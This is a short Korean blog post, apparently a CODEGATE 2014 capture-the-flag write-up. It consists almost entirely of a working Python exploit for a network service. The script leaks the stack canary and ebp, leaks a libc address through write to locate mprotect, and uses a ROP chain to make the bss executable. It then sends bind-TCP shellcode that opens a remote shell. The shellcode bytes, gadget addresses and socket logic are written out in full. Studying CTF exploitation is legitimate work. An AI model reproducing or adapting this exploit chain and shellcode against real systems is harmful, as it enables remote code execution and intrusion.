해당 문제의 exploit은 3개의 stage로 구성하였다.
stage1은 canary와 ebp를 구하는 부분
stage2은 write를 사용해 memory leak을 시켜서 mprotect의 주소를 구하는 부분
stage3은 mprotect로 bss영역에 실행권한을 준 뒤, bind_tcp쉘코드를 실행시키는 부분이다.
from socket import *
from struct import *
from time import sleep
p = lambda x : pack("<L", x)
up = lambda x : unpack("<L",x)[0]
HOST = "192.168.220.128"
PORT = 8888
write_plt = 0x080486e0
write_got = 0x0804b040
read_plt = 0x08048620
freespace = 0x0804b080
ppppr=0x080495bc
pr = 0x080495bf
fd = 4
shellcode=("\x31\xc0"+
"\x50"+
"\x40"+
"\x89\xc3"+
"\x50"+
"\x40"+
"\x50"+
"\x89\xe1"+
"\xb0\x66"+
"\xcd\x80"+
"\x31\xd2"+
"\x52"+
"\x66\x68\x13\xd2"+
"\x43"+
"\x66\x53"+
"\x89\xe1"+
"\x6a\x10"+
"\x51"+
"\x50"+
"\x89\xe1"+
"\xb0\x66"+
"\xcd\x80"+
"\x40"+
"\x89\x44\x24\x04"+
"\x43"+
"\x43"+
"\xb0\x66"+
"\xcd\x80"+
"\x83\xc4\x0c"+
"\x52"+
"\x52"+
"\x43"+
"\xb0\x66"+
"\xcd\x80"+
"\x93"+
"\x89\xd1"+
"\xb0\x3f"+
"\xcd\x80"+
"\x41"+
"\x80\xf9\x03"+
"\x75\xf6"+
"\x52"+
"\x68\x6e\x2f\x73\x68"+
"\x68\x2f\x2f\x62\x69"+
"\x89\xe3"+
"\x52"+
"\x53"+
"\x89\xe1"+
"\xb0\x0b"+
"\xcd\x80")
print "[+]exploit start"
print "[+]stage1"
#stage1
s=socket()
s.connect((HOST,PORT))
s.recv(1024)
s.recv(1024)
s.recv(1024)
s.recv(1024)
s.send("4")
s.recv(1024)
s.send("yyyyyyyyyyy")
parse_string=s.recv(1024)
s.close()
sleep(0.1)
print "[+]get canary"
canary=""
canary+=chr(0x00)
canary+=(parse_string)[23:26]
print "[+]get ebp"
ebp=""
ebp+=(parse_string)[34:38]
print "[+]stage2"
#stage2
payload = ""
payload += "a"*10
payload += canary
payload += "a"*8
payload += ebp
payload += p(write_plt)
payload += p(0)
payload += p(fd)
payload += p(write_got)
payload += p(4)
print "[+]reconnection"
s=socket()
s.connect((HOST,PORT))
s.recv(1024)
s.recv(1024)
s.recv(1024)
s.recv(1024)
s.send("4")
s.recv(1024)
print "[+]send payload"
s.send(payload)
sleep(1)
print "[+]get mprotect@libc"
write_libc=s.recv(4)
mprotect=up(write_libc)+0xc9a0
print "[+]mprotect address:%s" %hex(mprotect)
s.close()
print "[+]preparation payload"
payload = ""
payload += "a"*10
payload += canary
payload += "a"*8
payload += ebp
payload += p(mprotect)
payload += p(ppppr)
payload += p(0x0804b000)
payload += p(0x2000)
payload += p(7)
payload += ebp
payload += p(read_plt)
payload += p(freespace)
payload += p(fd)
payload += p(freespace)
payload += p(len(shellcode))
print "[+]stage3"
#stage3
print "[+]reconnection"
s=socket()
s.connect((HOST,PORT))
s.recv(1024)
s.recv(1024)
s.recv(1024)
s.recv(1024)
s.send("4")
s.recv(1024)
print "[+]send payload"
s.send(payload)
sleep(1)
print "[+]send shellcode"
s.send(shellcode)
s.close()
'CTF > CODEGATE 2014' 카테고리의 다른 글
| CODEGATE2014 vuln300 (4stone) write-up (0) | 2014.05.11 |
|---|---|
| CODEGATE2014 Nuclear control system write_up (0) | 2014.05.11 |